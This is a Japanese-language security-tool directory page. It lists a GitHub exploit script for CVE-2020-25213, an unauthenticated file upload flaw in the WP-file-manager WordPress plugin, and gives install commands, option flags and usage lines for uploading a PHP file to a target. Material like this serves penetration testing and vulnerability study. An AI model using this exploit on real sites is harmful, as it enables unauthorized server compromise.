Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wp-file-manager-CVE-2020-25213 — https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8 | Kitploit
ツール/GitHubGitHub/mansoorr123/wp-file-manager-cve-2020-25213
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmansoorr123/wp-file-manager-cve-2020-25213

wp-file-manager-CVE-2020-25213

https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
58265年前Kitploit レビュー済み

WP-file-manager エクスプロイト CVE-2020-25213

WP-file-manager WordPress プラグイン(<6.9)は、認証されていない任意のファイルアップロードに対して脆弱であり、システム全体が侵害される可能性があります。

詳細については、こちら に公開した私の記事を参照してください。

免責事項

私はこの脆弱性を発見したわけではなく、このCVEの功績を主張するものでもありません。私は、wordfence や seravo などのさまざまなブログで公開されている説明を分析してエクスプロイトを作成しただけであり、その目的は、読者が脆弱性の説明を分析するだけでPOCを作成する方法を理解できるようにすることです。
このエクスプロイトを使用して組織に損害が生じた場合、私は一切の責任を負いません。また、読者の皆様には、組織の書面による同意なしにこの脆弱性を悪用しないようお勧めします。悪用すると、組織が他のハッカーによる攻撃にさらされる可能性があります。

インストール

git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh

スイッチ

root@kitploit:~
-u|--wp_url				Wordpress target url  
-f|--upload_file			Absolute location of local file to upload on the target.  
-k|--check				Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.  
-v|--verbose				Also prints curl command which is going to be executed  
-h|--help				Print Help menu  

使い方

./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose

スクリーンショット

スクリーンショット 1 スクリーンショット 2 スクリーンショット 3

クレジット

  1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
  2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
ツールをダウンロード